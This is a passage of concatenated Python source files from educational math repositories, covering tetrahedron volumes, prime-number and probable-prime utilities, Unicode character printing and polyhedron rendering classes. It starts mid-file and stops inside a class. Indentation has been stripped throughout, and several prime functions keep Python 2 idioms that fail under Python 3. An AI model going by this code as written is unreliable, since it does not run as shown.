√(1/9) 0.353553 0.333333 0.333333
√(2/9) 0.500000 0.471405 0.471405
√(3/9) 0.612372 0.577350 0.577350
√(4/9) 0.707107 0.666667 0.666667
√(5/9) 0.790569 0.745356 0.745356
√(6/9) 0.866025 0.816497 0.816497
√(7/9) 0.935414 0.881917 0.881917
√(8/9) 1.000000 0.942809 0.942809
√(9/9) 1.060660 1.000000 1.000000
"""
print("Vol. IVM XYZ check")
for n in range(10):
# coverA or coverB will give the same answers as the
# complementary tetrahedrons have the same volume
tet = Tetrahedron(1, 1, 1, 1, 1, coverA(n)/2)
print("√({}/9) {:6f} {:6f} {:6f}".format(
n, tet.ivm_volume(), tet.xyz_volume(), sqrt(n/9)))
if __name__ == "__main__":
import doctest
doctest.testmod(verbose=True)
```
#### File: 4dsolutions/Python5/primes.py
```python
"""
primes.py -- Oregon Curriculum Network (OCN)
Feb 1, 2001 changed global var primes to _primes, added relative primes test
Dec 17, 2000 appended probable prime generating methods, plus invmod
Dec 16, 2000 revised to use pow(), removed methods not in text, added sieve()
Dec 12, 2000 small improvements to erastosthenes()
Dec 10, 2000 added Euler test
Oct 3, 2000 modified fermat test
Jun 5, 2000 rewrite of erastosthenes method
May 19, 2000 added more documentation
May 18, 2000 substituted Euclid's algorithm for gcd
Apr 7, 2000 changed name of union function to 'cover' for consistency
Apr 6, 2000 added union, intersection -- changed code of lcm, gcd
Apr 5, 2000 added euler, base, expo functions (renamed old euler to phi)
Mar 31, 2000 added sieve, renaming/modifying divtrial
Mar 30, 2000 added LCM, GCD, euler, fermat
Mar 28, 2000 added lcm
Feb 18, 2000 improved efficiency of isprime(), made getfactors recursive
Apr 28, 2013 changed LCM to not use reduce
Sep 4, 2017 convert to Python 3.6, move to Github
"""
import time, random, operator
from functools import reduce
_primes = [2] # global list of primes
def iseven(n):
"""Return true if n is even."""
return n%2==0
def isodd(n):
"""Return true if n is odd."""
return not iseven(n)
def get2max(maxnb):
"""Return list of primes up to maxnb."""
nbprimes = 0
if maxnb < 2: return []
# start with highest prime so far
i = _primes[-1]
# and add...
i = i + 1 + isodd(i)*1 # next odd number
if i <= maxnb: # if more prime checking needed...
while i<=maxnb:
if divtrial(i): _primes.append(i) # append to list if verdict true
i=i+2 # next odd number
nbprimes = len(_primes)
else:
for i in _primes: # return primes =< maxnb, even if more on file
if i<=maxnb: nbprimes = nbprimes + 1
else: break # quit testing once maxnb exceeded
return _primes[:nbprimes]
def get2nb(nbprimes):
"""Return list of primes with nbprimes members."""
if nbprimes>len(_primes):
# start with highest prime so far
i = _primes[-1]
# and add...
i = i + 1 + isodd(i)*1
while len(_primes)<nbprimes:
if divtrial(i): _primes.append(i)
i=i+2
return _primes[:nbprimes]
def isprime(n):
"""
Divide by primes until n proves composite or prime.
Brute force algorithm, will wimp out for humongous n
return 0 if n is divisible
return 1 if n is prime
"""
rtnval = 1
if n == 2: return 1
if n < 2 or iseven(n): return 0
maxnb = n ** 0.5 # 2nd root of n
# if n < largest prime on file, check for n in list
if n <= _primes[-1]: rtnval = (n in _primes)
# if primes up to root(n) on file, run divtrial (a prime test)
elif maxnb <= _primes[-1]: rtnval = divtrial(n)
else:
rtnval = divtrial(n) # check divisibility by primes so far
if rtnval==1: # now, if still tentatively prime...
# start with highest prime so far
i = _primes[-1]
# and add...
i = i + 1 + isodd(i)*1 # next odd number
while i <= maxnb:
if divtrial(i): # test of primehood
_primes.append(i) # append to list if prime
if not n%i: # if n divisible by latest prime
rtnval = 0 # then we're done
break
i=i+2 # next odd number
return rtnval
def iscomposite(n):
"""
Return true if n is composite.
Uses isprime"""
return not isprime(n)
def divtrial(n):
"""
Trial by division check whether a number is prime."""
verdict = 1 # default is "yes, add to list"
cutoff = n**0.5 # 2nd root of n
for i in _primes:
if not n%i: # if no remainder
verdict = 0 # then we _don't_ want to add
break
if i >= cutoff: # stop trying to divide by
break # lower primes when p**2 > n
return verdict
def erastosthenes(n):
"""
Suggestions from <NAME>, <NAME> and <NAME>"""
sieve = [0, 0, 1] + [1, 0] * (n/2) # [0 0 1 1 0 1 0...]
prime = 3 # initial odd prime
while prime**2 <= n:
for i in range(prime**2, n+1, prime*2):
sieve[i] = 0 # step through sieve by prime*2
prime += 1 + sieve[prime+1:].index(1) # get next prime
# filter includes corresponding integers where sieve = 1
return filter(lambda i, sieve=sieve: sieve[i], range(n+1))
def sieve(n):
"""
In-place sieving of odd numbers, adapted from code
by <NAME>
"""
candidates = range(3, n+1, 2) # start with odds
for p in candidates:
if p: # skip zeros
if p*p>n: break # done
for q in range(p*p, n+1, 2*p): # sieving
candidates[(q-3)/2] = 0
return [2] + filter(None, candidates) # [2] + remaining nonzeros
def base(n,b):
"""
Accepts n in base 10, returns list corresponding to n base b."""
output = []
while n>=1:
n,r = divmod(n,b) # returns quotient, remainder
output.append(r)
output.reverse()
return output
def fermat(n,b=2):
"""Test for primality based on Fermat's Little Theorem.
returns 0 (condition false) if n is composite, -1 if
base is not relatively prime
"""
if gcd(n,b)>1: return -1
else: return pow(b,n-1,n)==1
def jacobi(a,n):
"""Return jacobi number.
source: http://www.utm.edu/research/primes/glossary/JacobiSymbol.html"""
j = 1
while not a == 0:
while iseven(a):
a = a/2
if (n%8 == 3 or n%8 == 5): j = -j
x=a; a=n; n=x # exchange places
if (a%4 == 3 and n%4 == 3): j = -j
a = a%n
if n == 1: return j
else: return 0
def euler(n,b=2):
"""Euler probable prime if (b**(n-1)/2)%n = jacobi(a,n).
(stronger than simple fermat test)"""
term = pow(b,(n-1)/2.0,n)
jac = jacobi(b,n)
if jac == -1: return term == n-1
else: return term == jac
def getfactors(n):
"""Return list containing prime factors of a number."""
if isprime(n) or n==1: return [n]
else:
for i in _primes:
if not n%i: # if goes evenly
n = n//i
return [i] + getfactors(n)
def gcd(a,b):
"""Return greatest common divisor using Euclid's Algorithm."""
while b:
a, b = b, a % b
return a
def lcm(a,b):
"""
Return lowest common multiple."""
return (a*b)/gcd(a,b)
def GCD(terms):
"Return gcd of a list of numbers."
return reduce(lambda a,b: gcd(a,b), terms)
def LCM(terms):
"Return lcm of a list of numbers."
result = 1
for t in terms:
result = lcm(result, t)
return result
def phi(n):
"""Return number of integers < n relatively prime to n."""
product = n
used = []
for i in getfactors(n):
if i not in used: # use only unique prime factors
used.append(i)
product = product * (1 - 1.0/i)
return int(product)
def relprimes(n,b=1):
"""
List the remainders after dividing n by each
n-relative prime * some relative prime b
"""
relprimes = []
for i in range(1,n):
if gcd(i,n)==1: relprimes.append(i)
print(" n-rp's: %s" % (relprimes))
relprimes = map(operator.mul,[b]*len(relprimes),relprimes)
newremainders = map(operator.mod,relprimes,[n]*len(relprimes))
print("b * n-rp's mod n: %s" % newremainders)
def testeuler(a,n):
"""Test Euler's Theorem"""
if gcd(a,n)>1:
print("(a,n) not relative primes")
else:
print("Result: %s" % pow(a,phi(n),n))
def goldbach(n):
"""Return pair of primes such that p1 + p2 = n."""
rtnval = []
_primes = get2max(n)
if isodd(n) and n >= 5:
rtnval = [3] # 3 is a term
n = n-3 # 3 + goldbach(lower even)
if n==2: rtnval.append(2) # catch 5
else:
if n<=3: rtnval = [0,0] # quit if n too small
for i in range(len(_primes)):
# quit if we've found the answer
if len(rtnval) >= 2: break
# work back from highest prime < n
testprime = _primes[-(i+1)]
for j in _primes:
# j works from start of list
if j + testprime == n:
rtnval.append(j)
rtnval.append(testprime) # answer!
break
if j + testprime > n:
break # ready for next testprime
return rtnval
"""
The functions below have to do with encryption, and RSA in
particular, which uses large probable _primes. More discussion
at the Oregon Curriculum Network website is at
http://www.inetarena.com/~pdx4d/ocn/clubhouse.html
"""
def bighex(n):
hexdigits = list('0123456789ABCDEF')
hexstring = random.choice(hexdigits[1:])
for i in range(n):
hexstring += random.choice(hexdigits)
return eval('0x'+hexstring)
def bigdec(n):
decdigits = list('0123456789')
decstring = random.choice(decdigits[1:])
for i in range(n):
decstring += random.choice(decdigits)
return decstring
def bigppr(digits=100):
"""
Randomly generate a probable prime with a given
number of decimal digits
"""
start = time.clock()
print("Working...")
candidate = int(bigdec(digits)) # or use bighex
if candidate & 1==0:
candidate += 1
prob = 0
while True:
prob=pptest(candidate)
if prob>0: break
else: candidate += 2
print("Percent chance of being prime: %r" % (prob*100))
print("Elapsed time: %s seconds" % (time.clock()-start))
return candidate
def pptest(n):
"""
Simple implementation of Miller-Rabin test for
determining probable primehood.
"""
bases = [random.randrange(2,50000) for x in range(90)]
# if any of the primes is a factor, we're done
if n<=1: return 0
for b in bases:
if n%b==0: return 0
tests,s = 0, 0
m = n-1
# turning (n-1) into (2**s) * m
while not m&1: # while m is even
m >>= 1
s += 1
for b in bases:
tests += 1
isprob = algP(m,s,b,n)
if not isprob: break
if isprob: return (1-(1./(4**tests)))
else: return 0
def algP(m,s,b,n):
"""
based on Algorithm P in Donald Knuth's 'Art of
Computer Programming' v.2 pg. 395
"""
result = 0
y = pow(b,m,n)
for j in range(s):
if (y==1 and j==0) or (y==n-1):
result = 1
break
y = pow(y,2,n)
return result
def invmod(a,b):
"""
Return modular inverse using a version Euclid's Algorithm
Code by <NAME> in Python Journal:
http://www.pythonjournal.com/volume1/issue1/art-algorithms/
-- in turn also based on Knuth, vol 2.
"""
a1, a2, a3 = 1, 0, a
b1, b2, b3 = 0, 1, b
while b3 != 0:
# The following division will drop decimals.
q = a3 / b3
t = a1 - b1*q, a2 - b2*q, a3 - b3*q
a1, a2, a3 = b1, b2, b3
b1, b2, b3 = t
while a2<0: a2 = a2 + a
return a2
```
#### File: 4dsolutions/Python5/tetravolume.py
```python
from math import sqrt as rt2
from qrays import Qvector, Vector
import sys
R =0.5
D =1.0
S3 = pow(9/8, 0.5)
root2 = rt2(2)
root3 = rt2(3)
root5 = rt2(5)
root6 = rt2(6)
PHI = (1 + root5)/2.0
class Tetrahedron:
"""
Takes six edges of tetrahedron with faces
(a,b,d)(b,c,e)(c,a,f)(d,e,f) -- returns volume
if ivm and xyz
"""
def __init__(self, a, b, c, d, e, f):
# a,b,c,d,e,f = [Decimal(i) for i in (a,b,c,d,e,f)]
self.a, self.a2 = a, a**2
self.b, self.b2 = b, b**2
self.c, self.c2 = c, c**2
self.d, self.d2 = d, d**2
self.e, self.e2 = e, e**2
self.f, self.f2 = f, f**2
def ivm_volume(self):
ivmvol = ((self._addopen()
- self._addclosed()
- self._addopposite())/2) ** 0.5
return ivmvol
def xyz_volume(self):
xyzvol = 1/S3 * self.ivm_volume()
return xyzvol
def _addopen(self):
a2,b2,c2,d2,e2,f2 = self.a2, self.b2, self.c2, self.d2, self.e2, self.f2
sumval = f2*a2*b2
sumval += d2 * a2 * c2
sumval += a2 * b2 * e2
sumval += c2 * b2 * d2
sumval += e2 * c2 * a2
sumval += f2 * c2 * b2
sumval += e2 * d2 * a2
sumval += b2 * d2 * f2
sumval += b2 * e2 * f2
sumval += d2 * e2 * c2
sumval += a2 * f2 * e2
sumval += d2 * f2 * c2
return sumval
def _addclosed(self):
a2,b2,c2,d2,e2,f2 = self.a2, self.b2, self.c2, self.d2, self.e2, self.f2
sumval = a2 * b2 * d2
sumval += d2 * e2 * f2
sumval += b2 * c2 * e2
sumval += a2 * c2 * f2
return sumval
def _addopposite(self):
a2,b2,c2,d2,e2,f2 = self.a2, self.b2, self.c2, self.d2, self.e2, self.f2
sumval = a2 * e2 * (a2 + e2)
sumval += b2 * f2 * (b2 + f2)
sumval += c2 * d2 * (c2 + d2)
return sumval
def make_tet(v0,v1,v2):
"""
three edges from any corner, remaining three edges computed
"""
tet = Tetrahedron(v0.length(), v1.length(), v2.length(),
(v0-v1).length(), (v1-v2).length(), (v2-v0).length())
return tet.ivm_volume(), tet.xyz_volume()
class Triangle:
def __init__(self, a, b, c):
self.a = a
self.b = b
self.c = c
def ivm_area(self):
ivmarea = self.xyz_area() * 1/rt2(3)
return ivmarea
def xyz_area(self):
"""
Heron's Formula, without the 1/4
"""
a,b,c = self.a, self.b, self.c
xyzarea = rt2((a+b+c) * (-a+b+c) * (a-b+c) * (a+b-c))
return xyzarea
def make_tri(v0,v1):
"""
three edges from any corner, remaining three edges computed
"""
tri = Triangle(v0.length(), v1.length(), (v1-v0).length())
return tri.ivm_area(), tri.xyz_area()
R = 0.5
D = 1.0
import unittest
class Test_Tetrahedron(unittest.TestCase):
def test_unit_volume(self):
tet = Tetrahedron(D, D, D, D, D, D)
self.assertEqual(tet.ivm_volume(), 1, "Volume not 1")
def test_e_module(self):
e0 = D
e1 = root3 * PHI**-1
e2 = rt2((5 - root5)/2)
e3 = (3 - root5)/2
e4 = rt2(5 - 2*root5)
e5 = 1/PHI
tet = Tetrahedron(e0, e1, e2, e3, e4, e5)
self.assertTrue(1/23 > tet.ivm_volume()/8 > 1/24, "Wrong E-mod")
def test_unit_volume2(self):
tet = Tetrahedron(R, R, R, R, R, R)
self.assertAlmostEqual(tet.xyz_volume(), 0.117851130)
def test_unit_volume3(self):
tet = Tetrahedron(R, R, R, R, R, R)
self.assertAlmostEqual(tet.ivm_volume(), 0.125)
def test_phi_edge_tetra(self):
tet = Tetrahedron(D, D, D, D, D, PHI)
self.assertAlmostEqual(float(tet.ivm_volume()), 0.70710678)
def test_right_tetra(self):
e = pow((root3/2)**2 + (root3/2)**2, 0.5) # right tetrahedron
tet = Tetrahedron(D, D, D, D, D, e)
self.assertAlmostEqual(tet.xyz_volume(), 1)
def test_quadrant(self):
qA = Qvector((1,0,0,0))
qB = Qvector((0,1,0,0))
qC = Qvector((0,0,1,0))
tet = make_tet(qA, qB, qC)
self.assertAlmostEqual(tet[0], 0.25)
def test_octant(self):
x = Vector((R, 0, 0))
y = Vector((0, R, 0))
z = Vector((0, 0, R))
tet = make_tet(x,y,z)
self.assertAlmostEqual(tet[1], 1/6, 5) # good to 5 places
def test_quarter_octahedron(self):
a = Vector((D,0,0))
b = Vector((0,D,0))
c = Vector((R,R,root2/2))
tet = make_tet(a, b, c)
self.assertAlmostEqual(tet[0], 1, 5) # good to 5 places
def test_xyz_cube(self):
a = Vector((R, 0.0, 0.0))
b = Vector((0.0, R, 0.0))
c = Vector((0.0, 0.0, R))
R_octa = make_tet(a,b,c)
self.assertAlmostEqual(6 * R_octa[1], 1, 4) # good to 4 places
def test_s3(self):
D_tet = Tetrahedron(D, D, D, D, D, D)
a = Vector((R, 0.0, 0.0))
b = Vector((0.0, R, 0.0))
c = Vector((0.0, 0.0, R))
R_cube = 6 * make_tet(a,b,c)[1]
self.assertAlmostEqual(D_tet.xyz_volume() * S3, R_cube, 4)
def test_martian(self):
p = Qvector((2,1,0,1))
q = Qvector((2,1,1,0))
r = Qvector((2,0,1,1))
result = make_tet(5*q, 2*p, 2*r)
self.assertAlmostEqual(result[0], 20, 7)
def test_area_martian1(self):
p = Qvector((2,1,0,1))
q = Qvector((2,1,1,0))
result = p.area(q)
self.assertAlmostEqual(result, 1)
def test_area_martian2(self):
p = 3 * Qvector((2,1,0,1))
q = 4 * Qvector((2,1,1,0))
result = p.area(q)
self.assertAlmostEqual(result, 12)
def test_area_martian3(self):
qx = Vector((D,0,0)).quadray()
qy = Vector((R,rt2(3)/2,0)).quadray()
result = qx.area(qy)
self.assertAlmostEqual(result, 1, 7)
def test_area_earthling1(self):
vx = Vector((1,0,0))
vy = Vector((0,1,0))
result = vx.area(vy)
self.assertAlmostEqual(result, 1)
def test_area_earthling2(self):
vx = Vector((2,0,0))
vy = Vector((1,rt2(3),0))
result = vx.area(vy)
self.assertAlmostEqual(result, 2*rt2(3))
def test_phi_tet(self):
"edges from common vertex: phi, 1/phi, 1"
p = Vector((1, 0, 0))
q = Vector((1, 0, 0)).rotz(60) * PHI
r = Vector((0.5, root3/6, root6/3)) * 1/PHI
result = make_tet(p, q, r)
self.assertAlmostEqual(result[0], 1, 7)
def test_phi_tet_2(self):
p = Qvector((2,1,0,1))
q = Qvector((2,1,1,0))
r = Qvector((2,0,1,1))
result = make_tet(PHI*q, (1/PHI)*p, r)
self.assertAlmostEqual(result[0], 1, 7)
def test_phi_tet_3(self):
T = Tetrahedron(PHI, 1/PHI, 1.0,
root2, root2/PHI, root2)
result = T.ivm_volume()
self.assertAlmostEqual(result, 1, 7)
def test_koski(self):
a = 1
b = PHI ** -1
c = PHI ** -2
d = (root2) * PHI ** -1
e = (root2) * PHI ** -2
f = (root2) * PHI ** -1
T = Tetrahedron(a,b,c,d,e,f)
result = T.ivm_volume()
self.assertAlmostEqual(result, PHI ** -3, 7)
class Test_Triangle(unittest.TestCase):
def test_unit_area1(self):
tri = Triangle(D, D, D)
self.assertEqual(tri.ivm_area(), 1)
def test_unit_area2(self):
tri = Triangle(2, 2, 2)
self.assertEqual(tri.ivm_area(), 4)
def test_xyz_area3(self):
tri = Triangle(D, D, D)
self.assertEqual(tri.xyz_area(), rt2(3))
def test_xyz_area4(self):
v1 = Vector((D, 0, 0))
v2 = Vector((0, D, 0))
xyz_area = make_tri(v1, v2)[1]
self.assertAlmostEqual(xyz_area, 2)
def test_xyz_area5(self):
tri = Triangle(R, R, R)
self.assertAlmostEqual(tri.xyz_area(), (root3)/4)
def command_line():
args = sys.argv[1:]
try:
args = [float(x) for x in args] # floats
t = Tetrahedron(*args)
except TypeError:
t = Tetrahedron(1,1,1,1,1,1)
print("defaults used")
print(t.ivm_volume())
print(t.xyz_volume())
if __name__ == "__main__":
if len(sys.argv)==7:
command_line()
else:
unittest.main()
``` |
{
"source": "4dsolutions/python_camp",
"score": 3
} |
#### File: 4dsolutions/python_camp/unicode_fun.py
```python
def cherokee():
"""
U+13A0 – U+13FF (5024–5119)
http://www.alanwood.net/unicode/cherokee.html
(page only shows up to 13F4)
"""
for codepoint in range(int('13A0', 16), int('13F4', 16)):
print(chr(codepoint), end="")
print("----")
def emoji():
for codepoint in range(int('1F600', 16), int('1F620', 16)):
print(chr(codepoint), end=" ")
print("----")
def food_emoji():
emoji = [chr(codepoint) for codepoint in range(127812, 127857)]
for e in emoji:
print(e, end=" ")
print("----")
def hebrew():
"""
http://www.alanwood.net/unicode/hebrew.html
U+0590 – U+05FF (1424–1535)
"""
global letters
letters = [chr(codepoint)
for codepoint in
range(int('05D0', 16),
int('05EA', 16))]
print("".join(letters))
print("----")
def greek():
for codepoint in range(int('03D0', 16), int('03FF', 16)):
print(chr(codepoint), end="")
print("----")
def korean():
for codepoint in range(int('BB00', 16), int('BBAF', 16)):
print(chr(codepoint), end="")
print("----")
def arabic():
"""
http://www.alanwood.net/unicode/arabic.html
U+0600 – U+06FF (1536–1791)
"""
print(" ".join([chr(codepoint)
for codepoint in range(int('0600', 16),
int('06FF', 16))]))
print("----")
def main():
print("EMOJI:\n\n")
emoji()
print("HEBREW:\n\n")
hebrew()
print("GREEK & COPTIC:\n\n")
greek()
print("KOREAN:\n\n")
korean()
print("ARABIC:\n\n")
arabic()
print()
print("CHEROKEE:\n\n")
cherokee()
html_top = """<!DOCTYPE html>
<html>
<head>
<title>Unicode Stuff</title>
</head>
<body>
<h1>Unicode Stuff</h1>
<p>"""
# Make an HTML sandwich!
html_bottom = """</p>
</body>
</html>"""
def html():
"""
This is a fancy advanced option. The point of saving all the
output to an HTML file is maybe your browser will do an even
better job of rendering these unicode characters, worth a try.
https://kite.com/python/answers/how-to-redirect-print-output-to-a-text-file-in-python
https://www.blog.pythonlibrary.org/2016/06/16/python-101-redirecting-stdout/
"""
original = sys.stdout
sys.stdout = open("unicode.html", "w", encoding='utf-8')
# HTML sandwich
print(html_top)
main() # sandwich meat!
print(html_bottom, end="")
sys.stdout.flush()
sys.stdout.close()
sys.stdout = original
# Now lets put in some line breaks, since HTML
# pays no attention to newlines \n
with open("unicode.html", "r", encoding='utf-8') as the_file:
text = the_file.read().replace(":\n\n", "<br/>").replace("----","<br/><br/>")
with open("unicode.html", "w", encoding='utf-8') as the_file:
the_file.write(text)
print("OK, open unicode.html in browser")
def the_help():
options = "\n".join(sorted(menu_options.keys()))
print("$ python -m unicode_fun name\n"
"where name is:\n",
options + "\n", sep="")
menu_options = {
"arabic": arabic,
"cherokee": cherokee,
"hebrew": hebrew,
"greek": greek,
"korean": korean,
"emoji": emoji,
"food" : food_emoji,
"all": main,
"html": html,
"--help": the_help,
"-h": the_help}
if __name__ == "__main__":
import sys
if len(sys.argv)>1:
requested_unicode = sys.argv[1]
# print(sys.argv)
if requested_unicode in menu_options:
# don't just eval() whatever is passed in!
menu_options[requested_unicode]()
else:
the_help()
``` |
{
"source": "4dsolutions/School_of_Tomorrow",
"score": 3
} |
#### File: 4dsolutions/School_of_Tomorrow/flextegrity.py
```python
class Polyhedron:
"""
Designed to be subclassed, not used directly
"""
def scale(self, scalefactor):
if hasattr(self, "volume"):
self.volume = scalefactor ** 3
newverts = {}
for v in self.vertexes:
newverts[v] = self.vertexes[v] * scalefactor
newme = type(self)()
newme.vertexes = newverts # substitutes new guts
newme.edges = newme._distill() # update edges to use new verts
return newme
__mul__ = __rmul__ = scale
def translate(self, vector):
newverts = {}
for v in self.vertexes:
newverts[v] = self.vertexes[v] + vector
newme = type(self)()
newme.vertexes = newverts # substitutes new tent stakes
if hasattr(self, "center"): # shift center before suppress!
newme.center = self.center + vector
if hasattr(self, "suppress"):
newme.suppress = self.suppress
if newme.suppress:
newme.faces = newme._suppress()
newme.edges = newme._distill() # update edges to use new verts
return newme
__add__ = __radd__ = translate
def _distill(self):
edges = []
unique = set()
for f in self.faces:
for pair in zip(f , f[1:] + (f[0],)):
unique.add( tuple(sorted(pair)) )
for edge in unique:
edges.append( Edge(self.vertexes[edge[0]],
self.vertexes[edge[1]]) )
return edges
class Edge:
"""
Edges are defined by two Vectors (above) and express as cylinder via draw().
"""
def __init__(self, v0, v1):
self.v0 = v0 # actual coordinates, not a letter label
self.v1 = v1
def __repr__(self):
return 'Edge from %s to %s' % (self.v0, self.v1)
def draw_vert(v, c, r, t):
v = v.xyz
x,y,z = v.x, v.y, v.z
data = "< %s, %s, %s >" % (x,y,z), r, c
template = ("sphere { %s, %s texture "
"{ pigment { color %s } } no_shadow }")
print(template % data, file=t)
def draw_face(f, c, t): pass
def draw_edge(e, c, r, t):
v = e.v0.xyz
v0 = "< %s, %s, %s >" % (v.x, v.y, v.z)
v = e.v1.xyz
v1 = "< %s, %s, %s >" % (v.x, v.y, v.z)
data = (v0, v1, r, c)
template = ("cylinder { %s, %s, %s texture "
"{pigment { color %s } } no_shadow }")
print(template % data, file=t)
def draw_poly(p, the_file, v=True, f=False, e=True):
ec = p.edge_color
er = p.edge_radius
vc = p.vert_color
vr = p.vert_radius
fc = p.face_color
if v:
for v in p.vertexes.values():
draw_vert(v, vc, vr, the_file)
if f:
for f in p.faces:
draw_face(f, fc, the_file)
if e:
for e in p.edges:
draw_edge(e, ec, er, the_file)
import math
from qrays import Qvector, Vector
PHI = (1 + math.sqrt(5))/2.0
ORIGIN = Qvector((0,0,0,0))
A = Qvector((1,0,0,0))
B = Qvector((0,1,0,0))
C = Qvector((0,0,1,0))
D = Qvector((0,0,0,1))
E,F,G,H = B+C+D, A+C+D, A+B+D, A+B+C
I,J,K,L,M,N = A+B, A+C, A+D, B+C, B+D, C+D
O,P,Q,R,S,T = I+J, I+K, I+L, I+M, N+J, N+K
U,V,W,X,Y,Z = N+L, N+M, J+L, L+M, M+K, K+J
# OPPOSITE DIAGONALS
# ZY WX
# RV OS
# TU PQ
control = (Z - T).length()
midface = (Z + Y)
gold = 0.5 * PHI * midface/midface.length()
Zi = gold + J/J.length() * control/2
Yi = gold + M/M.length() * control/2
midface = (W + X)
gold = 0.5 * PHI * midface/midface.length()
Wi = gold + J/J.length() * control/2
Xi = gold + M/M.length() * control/2
midface = (R + V)
gold = 0.5 * PHI * midface/midface.length()
Ri = gold + I/I.length() * control/2
Vi = gold + N/N.length() * control/2
midface = (O + S)
gold = 0.5 * PHI * midface/midface.length()
Oi = gold + I/I.length() * control/2
Si = gold + N/N.length() * control/2
midface = (T + U)
gold = 0.5 * PHI * midface/midface.length()
Ti = gold + K/K.length() * control/2
Ui = gold + L/L.length() * control/2
midface = (P + Q)
gold = 0.5 * PHI * midface/midface.length()
Pi = gold + K/K.length() * control/2
Qi = gold + L/L.length() * control/2
class Tetrahedron(Polyhedron):
"""
Tetrahedron
"""
def __init__(self):
# POV-Ray
self.edge_color = "rgb <{}, {}, {}>".format(1, 165/255, 0) # orange
self.edge_radius= 0.03
self.vert_color = "rgb <{}, {}, {}>".format(1, 165/255, 0) # orange
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>" # not used
verts = dict(a = Qvector((1,0,0,0)), #A
b = Qvector((0,1,0,0)), #B
c = Qvector((0,0,1,0)), #C
d = Qvector((0,0,0,1))) #D
self.name = "Tetrahedron"
self.volume = 1 # per Concentric Hierarchy
self.center = ORIGIN
# 4 vertices
self.vertexes = verts
# 4 faces
self.faces = (('a','b','c'),('a','c','d'),
('a','d','b'),('b','d','c'))
self.edges = self._distill()
class InvTetrahedron(Polyhedron):
"""
Inverse Tetrahedron
"""
def __init__(self):
# POV-Ray
self.edge_color = "rgb <{}, {}, {}>".format(0, 0, 0) # black
self.edge_radius= 0.03
self.vert_color = "rgb <{}, {}, {}>".format(0, 0, 0) # black
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>" # not used
verts = dict(e = -Qvector((1,0,0,0)), #E
f = -Qvector((0,1,0,0)), #F
g = -Qvector((0,0,1,0)), #G
h = -Qvector((0,0,0,1))) #H
self.name = "InvTetrahedron"
self.volume = 1 # per Concentric Hierarchy
self.center = ORIGIN
# 4 vertices
self.vertexes = verts
# 4 faces
self.faces = (('e','f','g'),('e','g','h'),
('e','h','f'),('f','h','g'))
self.edges = self._distill()
class Cube (Polyhedron):
"""
Cube
"""
def __init__(self):
# POV-Ray
self.edge_color = "rgb <0, 1, 0>"
self.edge_radius= 0.03
self.vert_color = "rgb <0, 1, 0>"
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>"
verts = {}
for vert_label in "abcdefgh":
# keep the uppercase A-Z universe (namespace) unobstructed
verts[vert_label] = eval(vert_label.upper())
self.name = "Cube"
self.volume = 3 # per Concentric Hierarchy
self.center = ORIGIN
# 8 vertices
self.vertexes = verts
# 6 faces
self.faces = (('a','f','c','h'),('h','c','e','b'),
('b','e','d','g'),('g','d','f','a'),
('c','f','d','e'),('a','h','b','g'))
self.edges = self._distill()
class Cuboid (Polyhedron):
"""
Cuboid with height, width, depth = sqrt(1), sqrt(2), sqrt(4)
"""
def __init__(self):
# POV-Ray
self.edge_color = "rgb <255/255, 20/255, 147/255>"
self.edge_radius= 0.03
self.vert_color = "rgb <255/255, 20/255, 147/255>"
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>"
verts = {}
verts['A'] = Vector(( 1, 0.5, math.sqrt(2)/2))
verts['B'] = Vector(( 1, -0.5, math.sqrt(2)/2))
verts['C'] = Vector(( 1, -0.5, -math.sqrt(2)/2))
verts['D'] = Vector(( 1, 0.5, -math.sqrt(2)/2))
verts['E'] = Vector((-1, 0.5, math.sqrt(2)/2))
verts['F'] = Vector((-1, -0.5, math.sqrt(2)/2))
verts['G'] = Vector((-1, -0.5, -math.sqrt(2)/2))
verts['H'] = Vector((-1, 0.5, -math.sqrt(2)/2))
self.name = "Cuboid"
self.volume = 8 # per Concentric Hierarchy
self.center = ORIGIN
# 8 vertices
self.vertexes = verts
# 6 faces
self.faces = (('A','B','C','D'),('E','F','G','H'),
('A','E','F','B'),('D','H','G','C'),
('A','E','H','D'),('B','F','G','C'))
self.edges = self._distill()
class Octahedron (Polyhedron):
"""
Octahedron
"""
def __init__(self):
# POV-Ray
self.edge_color = "rgb <1, 0, 0>"
self.edge_radius= 0.03
self.vert_color = "rgb <1, 0, 0>"
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>"
verts = {}
for vert_label in "ijklmn":
# keep the uppercase A-Z universe unobstructed
verts[vert_label] = eval(vert_label.upper())
self.name = "Octahedron"
self.volume = 4 # per Concentric Hierarchy
self.center = ORIGIN
# 6 vertices
self.vertexes = verts
# 8 faces
self.faces = (('j','k','i'),('j','i','l'),('j','l','n'),('j','n','k'),
('m','k','i'),('m','i','l'),('m','l','n'),('m','n','k'))
self.edges = self._distill()
class RD (Polyhedron):
"""
Rhombic Dodecahedron
"""
def __init__(self):
self.edge_color = "rgb <0, 0, 1>"
self.edge_radius= 0.03
self.vert_color = "rgb <0, 0, 1>"
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>"
verts = {}
for vert_label in "abcdefghijklmn":
# keep the uppercase A-Z universe unobstructed
verts[vert_label] = eval(vert_label.upper())
self.name = "RD"
self.volume = 6 # per Concentric Hierarchy
self.center = ORIGIN
# 14 vertices
self.vertexes = verts
# 12 faces
# I,J,K,L,M,N = A+B, A+C, A+D, B+C, B+D, C+D
self.faces = (('j','f','k','a'),('j','f','n','c'),('j','c','l','h'),('j','h','i','a'),
('m','d','k','g'),('m','d','n','e'),('m','e','l','b'),('m','b','i','g'),
('k','d','n','f'),('n','c','l','e'),('l','h','i','b'),('i','a','k','g'))
self.edges = self._distill()
class Icosahedron (Polyhedron):
def __init__(self):
# 8 vertices
self.edge_color = "rgb <0, 1, 1>"
self.edge_radius= 0.03
self.vert_color = "rgb <0, 1, 1>"
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>"
self.vertexes = dict(o = Oi,
p = Pi,
q = Qi,
r = Ri,
s = Si,
t = Ti,
u = Ui,
v = Vi,
w = Wi,
x = Xi,
y = Yi,
z = Zi)
self.name = "Icosahedron"
self.volume = 18.51
self.center = ORIGIN
# 20 faces
# OPPOSITE DIAGONALS of cubocta
# ZY WX
# RV OS
# TU PQ
self.faces = (('o','w','s'),('o','z','s'),
('z','p','y'),('z','t','y'),
('t','v','u'),('t','s','u'),
